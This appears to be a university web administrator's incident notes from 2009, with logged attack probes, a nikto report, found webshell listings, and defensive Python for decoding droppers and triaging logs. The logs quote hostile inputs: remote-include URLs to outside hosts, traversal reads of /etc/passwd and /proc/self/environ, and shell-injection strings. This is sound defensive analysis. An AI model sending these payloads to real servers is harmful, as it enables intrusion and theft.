====== attempts on the new server ======
[[http://ws.arin.net/whois/]]

===== attempts at bouncing off of server =====
logwatch clue:
<code>
404 errors: /news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 1 Time(s)
</code>
<code>
[root@bacchus httpd]# grep 'ote_log/ec.txt' *
access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news/news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 200 22071
access_log.1:217.117.85.108 - - [10/May/2009:00:01:10 -0400] "GET /news.php?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 5275
</code>
ec.txt

===== hacked files on old server =====
Need to check ./hps-html/vids/thumbs/index.php
<code>
[root@bacchus www]# find . -user apache -iname index.php -exec ls -Flat {} \;
-rwxrw-r--  1 apache web-admin  3008 Jul 13  2005 ./aoe-html/computing/faq/index.php*
-rw-rw-r--  1 apache web-admin  1302 Aug 23  2005 ./aoe-html/computing/manuals/index.php
-rwxrw-r--  1 apache web-admin  1162 Aug 23  2005 ./aoe-html/computing/index.php*
-rw-r--r--  1 apache apache    18126 Nov 29  2006 ./aoe-html/organizations/vtsgt/delete this folder/index.php
-rwxrwxr-x  1 apache web-admin  3038 Jan 23  2006 ./aoe-html/research/facilities/dyppir/index.php*
-rw-r--r--  1 apache apache      168 Apr 15 03:07 ./hps-html/vids/thumbs/index.php
-rwxrw-r--  1 apache web-admin  2272 Jan 31  2006 ./secure-html/computing/online/index.php*
[root@bacchus www]# cat ./hps-html/vids/thumbs/index.php
</code>

== files dropped in these locations which were writeable by apache ==
  * www.sssl.aoe.vt.edu/documentation/hardware_components/top
  * www.sssl.aoe.vt.edu/simplePHPblog/
  * www.aoe.vt.edu/organizations/aiaa/lutze
  * www.aoe.vt.edu/organizations/vtsgt

===== nikto report =====
<code>
[root@traininglt nikto]# ./nikto.pl -host 128.173.188.87
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP:       128.173.188.87
+ Target Hostname: bacchus.ipv4.aoe.vt.edu
+ Target Port:     80
+ Start Time:      2009-05-12 15:34:28
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (Scientific Linux)
- /robots.txt - contains 3 'disallow' entries which should be manually viewed. (GET)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.1.6
+ OSVDB-0: ETag header found on server, inode: 32375282, size: 111, mtime: 0xb976d0c0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
+ OSVDB-637: GET /~root - Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ OSVDB-0: GET /index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
+ OSVDB-12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: GET /phpMyAdmin/ : phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: GET /index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /index.php?topic=<script>alert(document.cookie)</script>%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 20 item(s) reported on remote host
+ End Time:        2009-05-12 15:35:07 (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Test Options: -host 128.173.188.87
--------------------------------------------------------------------------
</code>

===== WWW2 =====
<code>
[root@webtest ~]# grep "sciencedirect" /var/log/httpd/*
/var/log/httpd/access_log.3:218.246.113.84 - - [25/Apr/2009:05:24:19 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25042 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
/var/log/httpd/access_log.4:58.252.189.17 - - [16/Apr/2009:09:56:03 -0400] "GET http://www.sciencedirect.com/science/subscriptionSummary/4875/J HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
/var/log/httpd/access_log.4:219.231.151.44 - - [18/Apr/2009:05:36:10 -0400] "GET http://www.sciencedirect.com/ HTTP/1.1" 200 25068 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"
</code>
  * The above appears to be an attempt to use us as a proxy to get to sciencedirect.com, which may filter by IP address; our address would be allowed access because it is a Virginia Tech Libraries resource.
  * **Recommended action:** block URI requests via mod_rewrite in .htaccess.

> I can't answer your root question, but here's a band-aid (requires mod_rewrite):
<code>
RewriteEngine on
RewriteRule ^/?http:// - [F]
</code>
> This will send a 403-Forbidden response for any request for "http://" or "/http://" followed by any URI.

<code>
"GET /phpMyAdmin-2.6.1-rc2/main.php HTTP/1.0" 404 316 "-" "-"
</code>
  * These are OK to ignore; phpMyAdmin is installed but only accessible to us.

<code>
"SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\...\x90\x90\x90\x90...
</code>
  * This was an attempt to attack via an IIS vulnerability; no worries here, we're not using a Windows-based web server.

<code>
"GET /thisdoesnotexistahaha.php HTTP/1.1"
</code>
  * This is an attempt to discover the type of web server and OS being used.
  * Solution:
> Why don't you create a file with that name, or at least a redirect
> statement in httpd.conf, that redirects the request to
> "yesitdoeshehe.php". ;)
<code>
% cat > yesitdoeshehe.php
#!/bin/bash
echo 'Content-type: text/plain'
echo
echo These are not the PHP scripts you are looking for.
exit 0
^D
% chmod +x yesitdoeshehe.php
</code>

<code>
"GET /xmlrpc.php HTTP/1.0" ; "GET /*/main.php"
</code>
  * Attempt to exploit an xmlrpc vulnerability via remote SQL injection.
  * We're safe here: fixed in PHP 5.0.5 and we're on 5.1.6.

===== May 10, 2009 Log Analysis =====
**Bacchus 05/10/2009 Log Review**

<code>
80.179.24.50 /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00   HTTP Response 200
</code>
An attempt to read the /proc/self/environ file; it fails and does nothing but take the user to the main page.

<code>
///skin/zero_vote/login.php?dir=http://fst ... ditors/id.txt??: 1 Time(s)
</code>
I cannot tell what this one is doing; unable to find any information other than reports of others having this entry in their logs as well. **Keep an eye on this one until we know what it does.**

<code>
//favorites.php?nuke_bb_root_path=http://h ... age/img/image??: 1 Time(s)
</code>
Vulnerability in the PHP-Nuke platform; we don't use this.

<code>
//templates/beez/index.php?act=http://www. ... /v6id.txt??????: 1 Time(s)
</code>
Again, can't find any relevant information on this entry. **Keep a watch on it.**

<code>
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0
</code>
Harmless; used by IE to determine if Office Server Extensions are enabled.

<code>
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518 ... MVER=4&CAPREQ=0
</code>
Something to do with Exchange 2003; don't think this concerns us, but keep a watch out for it again.

<code>
/academics/?PHPSESSID=6df789551664bd593103f8ccb27191c5
</code>
Traces back to Google, perhaps its crawler? Actually it's the same IP and PHPSESSID for each entry in the log where this occurs, which leads me to believe it is the Google crawler.

<code>
/alumni/alumnilist.php?class=http://144.20 ... 666/index.html?
</code>
No clue; traces back to Amsterdam.

<code>
/alumni/main/at/?continental-airline-tickets-3/: 1 Time(s)
/alumni/main/at/?last-minute-airline-tickets-3/: 1 Time(s)
</code>
**IP traces back to Yahoo, possibly its crawler?**

<code>
/awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C
</code>
We don't appear to use awstats.

<code>
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment1%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment2%2C+: 8 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment3%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment4%2C+: 11 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment5%2C+: 20 Time(s)
/calendars/windtunnel/index.php?PHPSESSID= ... on=comment6%2C+: 12 Time(s)
</code>
**No idea; traces back to Amsterdam, all returning 404s.**

<code>
/cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C
</code>
Hard to find information; however, it is a known exploit (php injection), worth looking into.
  * **When adding files back, check whether they're CGI.**

<code>
/cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C
</code>
Again with awstats; need to check if we do have it.

<code>
/cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s)
</code>
Again back to Amsterdam.

<code>
/cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s)
</code>
Amsterdam again. Allows remote execution of code on ZeroShell. **Go through and check all CGI occurrences; foreign hits on many of them.**

<code>
/errors.php?error=http://www.ayj.ca/buggsbunny??
</code>
Unsure; traces back to Amsterdam, Latin America.

<code>
/horde/services/help/?show=about&module=;% ... thru(%22id%22);
</code>
Attempted attack on a mail system (Horde); we don't use it.

<code>
/labsupport/labequipment.php?selfimageresi ... e=400&ysize=200
</code>
Don't think this is anything to worry about; it looks like it's just trying to load images onto a page that are resized by a PHP script.

<code>
/organizations/aiaa/index.php?go=calendar/ ... o/pics/id.txt??
</code>
Looks normal after all.

<code>
/organizations/index.php?inc=../../../../. ... oc/self/environ: 1 Time(s)
/organizations/index.php?inc=../../../../. ... self/environ%00: 1 Time(s)
</code>
Trying to access the environ file again; still didn't work.

<code>
/organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s)
</code>
Looks normal after all.

<code>
/organizations/vtsgt/index.php?inc=../../. ... oc/self/environ: 1 Time(s)
</code>
Again a failure.

<code>
/people/include/vtweb_html_1.12/assets/js/widgets.js: 81 Time(s)
</code>
Just a bug in our code.

<code>
/saffairs/pages/s/?free-credit-score-no-credit-card-3/: 1 Time(s)
</code>
Yahoo! crawler; interesting hit though.

<code>
/services/help/?show=about&module=;%22.passthru(%22id%22);
</code>
Amsterdam again. Another Horde attempt; we don't use it, so no worries here.

<code>
/twiki/bin/configure?action=image;image=%7Cid%7C;type=text
</code>
Amsterdam.

===== May 13, 2009 Log Analysis =====
404's
<code>
/%7eyongkm/java/thin/: 1 Time(s)
79.23.132.70 - - [12/May/2009:21:05:42 -0400] "GET /%7eyongkm/java/thin/ HTTP/1.1" 404 6624
</code>
<code>
[stedwar1@hephaistos ~]$ host 79.23.132.70
70.132.23.79.in-addr.arpa domain name pointer host70-132-dynamic.23-79-r.retail.telecomitalia.it.
</code>
<code>
///skin/zero_vote/ask_password.php?dir=htt ... schmasik.txt???: 2 Time(s)
210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f/747CONF.INP%20///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5311
210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5271
210.118.194.200 - - [12/May/2009:05:34:28 -0400] "GET /~mason/Mason_f///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 5247
</code>
<code>
//DOCUMENT_ROOT=http://irc.harazuku.co.cc/ ... sponz/id2.txt??: 4 Time(s)
199.120.90.222 - - [12/May/2009:12:55:14 -0400] "GET /~cwoolsey/Courses/AOE3134/Supplemental/RootLocusTechnique.pdf//DOCUMENT_ROOT=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 5297
</code>
===== May 14, 2009 Log Analysis =====
A total of 5 sites probed the server:
  * 194.83.8.126
  * 209.87.194.21
  * 222.124.24.77
  * 85.241.14.188
  * 87.106.253.45
Today this was found in research:
<code>
[root@bacchus research]# ls -Fla
total 132
drwxrwsr-x  7 apache web-admin 4096 May  4 09:39 ./
drwxrwsr-x 26 apache web-admin 4096 Apr 15 13:21 ../
-rw-r--r--  1 apache web-admin  378 May  4 09:39 15.php
[root@bacchus research]# cat 15.php
</code>
No .htaccess file was in healthcenter
<code>
195.151.216.49 - admin [04/May/2009:09:35:57 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 55416
131.107.155.228 - - [04/May/2009:09:36:00 -0400] "GET /~cdhall/Space/ HTTP/1.1" 200 72971
195.151.216.49 - admin [04/May/2009:09:36:00 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 41075
195.151.216.49 - admin [04/May/2009:09:36:08 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 16614
61.135.216.104 - - [04/May/2009:09:36:11 -0400] "GET /~cdhall/Space/index.rdf HTTP/1.1" 200 10220
198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 200 808664
198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 206 748477
195.151.216.49 - admin [04/May/2009:09:36:14 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 17045
66.235.124.59 - - [04/May/2009:09:36:17 -0400] "GET /%7Ekapania/StructuresPrelim/ HTTP/1.0" 200 11835
195.151.216.49 - admin [04/May/2009:09:36:18 -0400] "GET /prospective/sitemap.php HTTP/1.0" 200 22649
204.111.158.56 - - [04/May/2009:09:36:37 -0400] "GET /~aborgolt/aoe3054/classes/Class%206%20-%20Dynamic%20Response%20-%202009-02-23.pdf HTTP/1.1" 200 667923
195.151.216.49 - - [04/May/2009:09:36:38 -0400] "GET /alumni/15.php HTTP/1.0" 200 384
</code>
<code>
[root@bacchus www]# find /mnt/lacie/bacchus-hacked/ -iname sitemap.php
/mnt/lacie/bacchus-hacked/www/aoe-html/prospective/sitemap.php
/mnt/lacie/bacchus-hacked/www/aoe-html/sitemap.php
/mnt/lacie/bacchus-hacked/www/sssl-html/simplePHPblogOld/sitemap.php
[root@bacchus aoe-html]# ls -Fla /mnt/lacie/bacchus-hacked/www/aoe-html/prospective/
total 244
drwxrwsr-x  2 apache   web-admin   4096 May  4 09:52 ./
drwxrwsr-x 26 apache   web-admin   4096 Apr 15 13:21 ../
-rw-r--r--  1 apache   web-admin 147623 May  4 09:52 1.zip
-rwxrwxr-x  1 mkapania web-admin   3059 Sep  1  2008 index.php*
-rwxrwxr-x  1 mkapania web-admin   3053 Aug  7  2008 index.php~*
-rw-r--r--  1 lscharf  web-admin    207 Jun 10  2005 sitemap.dat
-rw-r--r--  1 apache   web-admin  44293 Apr 26 16:48 sitemap.php
</code>
<code>
74.6.17.174 - - [26/Apr/2009:16:00:18 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0074.html HTTP/1.0" 200 10701
67.195.111.186 - - [26/Apr/2009:16:01:15 -0400] "GET /vids/thumbs/?p=no-1-online-viagra HTTP/1.0" 200 6244
67.195.111.186 - - [26/Apr/2009:16:01:58 -0400] "GET /vids/thumbs/?p=daily-cialis-online HTTP/1.0" 200 6764
74.6.17.174 - - [26/Apr/2009:16:10:45 -0400] "GET /pics/weeki2007/Weeki_Wachee/3_Welcome_to_Weeki_Wachee/slides/IMG_0383.html HTTP/1.0" 200 9329
74.6.17.174 - - [26/Apr/2009:16:11:08 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0024.html HTTP/1.0" 200 10703
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/?p=cialis-1-a-day HTTP/1.1" 200 6681
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/script.js HTTP/1.1" 404 -
173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /favicon.ico HTTP/1.1" 404 -
74.6.17.174 - - [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/5_The_Event/slides/100_0266.html HTTP/1.0" 200 9116
74.6.17.174 -
</code>
- [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/res/styles.css HTTP/1.0" 304 - 65.55.208.216 - - [26/Apr/2009:16:16:34 -0400] "GET /html/pics4.html HTTP/1.1" 200 3234 74.6.17.174 - - [26/Apr/2009:16:16:35 -0400] "GET /pics/weeki2007/8_Underwater_2/slides/FH000029.html HTTP/1.0" 200 8766 67.195.111.186 - - [26/Apr/2009:16:16:39 -0400] "GET /vids/thumbs/?p=cheap-soft-cialis HTTP/1.0" 200 6898 95.52.81.134 - - [26/Apr/2009:16:18:38 -0400] "GET /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6688 74.6.17.174 - - [26/Apr/2009:16:19:17 -0400] "GET /np/2108.html HTTP/1.0" 304 - 95.52.81.134 - - [26/Apr/2009:16:19:23 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 5975 95.52.81.134 - - [26/Apr/2009:16:19:28 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 4203 95.52.81.134 - - [26/Apr/2009:16:19:30 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6014 95.52.81.134 - - [26/Apr/2009:16:19:34 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 8628 95.52.81.134 - - [26/Apr/2009:16:19:37 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3744 95.52.81.134 - - [26/Apr/2009:16:19:38 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237 95.52.81.134 - - [26/Apr/2009:16:19:52 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3288 95.52.81.134 - - [26/Apr/2009:16:19:59 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237 ... copied to sitemap.b64 cp -a sitemap.php sitemap.b64 remove all except the base64 data with vim -b sitemap.b64 openssl enc -d -base64 -a -A -in sitemap.b64 -out sitemap.gz ??? now what??? 
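The openssl step above ends with a file called sitemap.gz and the open question of how to get at the PHP inside. The Python below is an added example for these notes, not a tool used during the incident and not the contents of the real sitemap.php. It pulls the longest base64 run out of a captured PHP file (the part the vim -b step did by hand), decodes it, tries the three containers obfuscated PHP droppers usually wrap their body in (gzip; zlib, which PHP's gzuncompress() reads; and raw DEFLATE, which gzinflate() reads and which plain gunzip cannot open), and lists the dangerous function calls found in the result. The sample file it runs on is constructed inline with a harmless body.

```python
"""Decode a base64-wrapped, compressed blob found in a suspicious PHP file and
report what it contained. Added example; the sample input is constructed."""
import base64
import gzip
import re
import zlib

# PHP functions worth a second look in anything that ran as the apache user.
SUSPICIOUS = ("eval", "base64_decode", "gzinflate", "gzuncompress", "system",
              "passthru", "shell_exec", "exec", "popen", "assert", "preg_replace")


def extract_base64(php_source: str) -> str:
    """Return the longest base64-looking run (40+ chars) in the file."""
    runs = re.findall(r"[A-Za-z0-9+/=]{40,}", php_source)
    if not runs:
        raise ValueError("no base64 run of 40+ chars found")
    return max(runs, key=len)


def decompress_any(blob: bytes):
    """Try gzip, zlib and raw DEFLATE in turn; return (container name, bytes)."""
    attempts = (
        ("gzip", gzip.decompress),
        ("zlib (gzuncompress)", zlib.decompress),
        # gzinflate() output has no zlib header: negative wbits = raw DEFLATE.
        ("raw deflate (gzinflate)", lambda b: zlib.decompress(b, -zlib.MAX_WBITS)),
    )
    for name, fn in attempts:
        try:
            return name, fn(blob)
        except (OSError, zlib.error, EOFError):
            continue
    return "none (not compressed, or a different wrapper)", blob


def analyze(php_source: str) -> dict:
    """Decode the embedded blob and flag suspicious calls in the decoded text."""
    blob = base64.b64decode(extract_base64(php_source), validate=True)
    container, payload = decompress_any(blob)
    text = payload.decode("latin-1")  # never fails; keeps byte values intact
    hits = sorted(f for f in SUSPICIOUS
                  if re.search(r"\b%s\s*\(" % re.escape(f), text))
    return {"container": container, "payload": text, "suspicious_calls": hits}


# Constructed sample (hypothetical, not the real sitemap.php): a harmless body
# wrapped the way gzinflate()-style droppers wrap theirs.
SAMPLE_BODY = b'<?php /* constructed sample */ eval(base64_decode($payload)); ?>'


def _build_sample() -> str:
    deflater = zlib.compressobj(wbits=-zlib.MAX_WBITS)  # raw DEFLATE, like gzdeflate()
    raw = deflater.compress(SAMPLE_BODY) + deflater.flush()
    return '<?php eval(gzinflate(base64_decode("%s"))); ?>' % base64.b64encode(raw).decode()


SAMPLE_FILE = _build_sample()

if __name__ == "__main__":
    result = analyze(SAMPLE_FILE)
    print("container:", result["container"])
    print("suspicious calls:", ", ".join(result["suspicious_calls"]))
    print(result["payload"])
```

On a real capture, point analyze() at the file contents instead of SAMPLE_FILE; if the container comes back as "none", the wrapper is something else (str_rot13, a custom XOR, a second base64 layer) and the raw bytes are returned for the next round of unwrapping.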
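The access_log excerpts above, and the logwatch 404 summaries in the daily analyses further down, are being sorted by hand into directory traversal (etc/passwd, proc/self/environ, %00 terminators), remote includes where a parameter is itself a URL, shell metacharacters in CGI parameters, and webshell traffic (one address POSTing repeatedly to a .php dropped under an image directory). The Python below is an added example, not part of the original notes, that does that sorting over common-log-format lines and marks probes the server answered with 200 the way the May 20 "possible successful probes" check does. The log lines it runs on are constructed from request patterns quoted on this page with TEST-NET addresses; the media-directory POST rule is a heuristic motivated by DSC_0096.php, not a signature from any tool.

```python
"""Triage Apache common-log-format lines for the probe patterns in these notes.
Added example; the sample log is constructed."""
import re
from collections import Counter
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)
# Directories that should only ever serve static files (heuristic).
MEDIA_DIRS = ("/pics/", "/thumbs/", "/images/", "/gallery/", "/vids/")


def classify(uri: str, method: str) -> list:
    """Return the probe categories a request matches (empty list = looks normal)."""
    path, _, _query = uri.partition("?")
    decoded = unquote(uri)  # %7C -> |, %00 -> NUL, %2e -> .
    tags = []
    if "../" in decoded and re.search(r"etc/passwd|proc/self/environ", decoded):
        tags.append("lfi-traversal")
    if "\x00" in decoded:
        tags.append("null-byte")
    # A parameter whose value is a full URL: classic include($_GET[...]) abuse.
    if re.search(r"[?&][^=&]*=https?://", decoded):
        tags.append("rfi")
    if re.search(r"\|\s*(id|uname|pwd|echo)\b|passthru\(", decoded):
        tags.append("cmd-injection")
    if method == "POST" and path.endswith(".php") and any(d in path for d in MEDIA_DIRS):
        tags.append("post-to-php-in-media-dir")
    return tags


def parse(line: str):
    """Split one common-log-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(lines):
    """Return (findings, requests-per-probing-ip).

    A finding is a 'possible success' when the server answered 200, mirroring
    the string-match-plus-status check used in the daily log analyses."""
    findings, per_ip = [], Counter()
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        tags = classify(rec["uri"], rec["method"])
        if not tags:
            continue
        per_ip[rec["ip"]] += 1
        findings.append({
            "ip": rec["ip"], "uri": rec["uri"], "status": int(rec["status"]),
            "tags": tags, "possible_success": rec["status"] == "200",
        })
    return findings, per_ip


# Constructed sample lines (TEST-NET addresses); paths follow requests quoted on this page.
SAMPLE_LOG = """\
203.0.113.10 - - [20/May/2009:10:01:02 -0400] "GET /index.php?body=../../../../../../etc/passwd%00 HTTP/1.1" 200 5275
203.0.113.11 - - [20/May/2009:10:02:15 -0400] "GET /news.php?_SERVER[DOCUMENT_ROOT]=http://example.invalid/ec.txt? HTTP/1.1" 404 5275
203.0.113.12 - - [20/May/2009:10:03:40 -0400] "GET /cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C HTTP/1.1" 404 290
203.0.113.13 - - [26/Apr/2009:16:19:23 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 5975
203.0.113.13 - - [26/Apr/2009:16:19:28 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 4203
198.51.100.7 - - [20/May/2009:10:05:00 -0400] "GET /~cdhall/Space/index.rdf HTTP/1.1" 200 10220
"""

if __name__ == "__main__":
    found, counts = triage(SAMPLE_LOG.splitlines())
    for f in found:
        flag = "POSSIBLE SUCCESS" if f["possible_success"] else "blocked/404"
        print(f"{f['ip']:15} {f['status']} {flag:16} {','.join(f['tags'])}  {f['uri']}")
    print("requests per probing address:", dict(counts))
```

A 200 on a traversal or include probe is only "possible": the May 14 notes show the same requests answering 200 because the site redirected to the home page, so each hit still needs the response size and the target script checked by hand.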
<code>
[root@bacchus functions]# pwd
/mnt/lacie/bacchus-mar12009/www/aoe-html/calendars/phpical/functions
[root@bacchus functions]# ls -Fla
total 228
drwxrwsr-x 2 apache web-admin  4096 Jul 14  2003 ./
drwxrwsr-x 8 apache web-admin  4096 Jul 14  2003 ../
-rw-r--r-- 1 root   web-admin  1515 Jul 14  2003 date_add.php
-rw-r--r-- 1 root   web-admin  5417 Jul 14  2003 date_functions.php
-rw-r--r-- 1 root   web-admin  1640 Jul 14  2003 draw_functions.php
-rw-r--r-- 1 root   web-admin  2652 Jul 14  2003 error.php
-rw-rw-r-- 1 apache web-admin   451 Oct  2  2002 event.js
-rw-r--r-- 1 root   web-admin 27467 Jul 14  2003 ical_parser.php
-rw-r--r-- 1 root   web-admin  3554 Jul 14  2003 init.inc.php
-rw-r--r-- 1 root   web-admin  1954 Jul 14  2003 list_icals.php
-rw-r--r-- 1 apache web-admin 44333 Jul 14  2003 list_inc.php
-rw-r--r-- 1 root   web-admin   817 Jul 14  2003 list_months.php
-rw-r--r-- 1 root   web-admin  1248 Jul 14  2003 list_weeks.php
-rw-r--r-- 1 root   web-admin  1129 Jul 14  2003 list_years.php
-rw-r--r-- 1 root   web-admin  9903 Jul 14  2003 overlapping_events.php
-rw-r--r-- 1 root   web-admin 26810 Jul 14  2003 timezones.php
</code>

www2 was created around this date:

<code>
drwxr-xr-x 2 root root 4096 Oct 17 2008 www/
</code>

and the event.js and list_inc.php files (the two owned by apache above) still exist. They were likely deleted on this date:

<code>
drwxrwsr-x 2 apache web-admin 4096 Apr 26 16:30 functions/
</code>

===== May 14, 2009 Log Analysis =====

May 14th Log Analysis (Bacchus)

<code>
//?page=../../../../../../../../../../../../../etc/passwd%00   HTTP Response 200
</code>
A failed attempt to read the passwd file; it just redirected to the home page.

<code>
/index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00   HTTP Response 200
</code>
Another failed attempt; it just went to the home page.

<code>
null   HTTP Response 200
</code>
This is generated by IE 7 requesting an unavailable resource. Does no damage (and doesn't happen in Firefox).

<code>
//include/print_category.php?setup[use_cat ... ve.com/id.txt??: 2 Time(s)
</code>
Checking on this one right now, will come back to it later.
<code>
/alumni/alumnilist.php?class=http://193.12 ... 666/index.html?: 2 Time(s)
</code>
Need to add an input verification script on this file. It will guarantee this access fails.

<code>
/computing/faq/displayfaq.php?area_id=http ... 666/index.html?: 3 Time(s)
</code>
Coming from Amsterdam; probably need an input verifier on this page as well.

<code>
/hall.php?page=http://darkn3st.fileave.com/fx29id.txt?: 1 Time(s)
/hall.php?page=http://www.ladyboss.com.ua/fx29id2.txt???: 2 Time(s)
</code>
There is no file called hall.php; there is a randolph_hall.php, but it looks secure and takes no parameters.

<code>
/photo_comment.php?toroot=http://www.reeft ... a/index/bo.do??: 2 Time(s)
</code>
I can't find a file called photo_comment.php, but if it exists it should probably have an input verifier on it.

<code>
/~cdhall/courses/AUAE/styles_sniffer.js: 1 Time(s)
</code>
Can't find the file... not sure about this one.

<code>
http://88.80.7.248/pp/anp.php?a=UV%5CHWQBY ... U&b=1155&c=b870: 1 Time(s)
</code>
Traces to a site in Sweden called fast-medications.net...

===== May 16, 2009 Log Analysis =====

<code>
404's
//ee_commerce/paypalcart.php?toroot=http:/ ... MADONGCMD.txt??: 3 Time(s)
//include/admin.lib.inc.php?site_path=http ... s/93/yes.txt???: 1 Time(s)
//include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s)
//photo_comment.php?toroot=http://www.trit ... m/2009/id.txt??: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
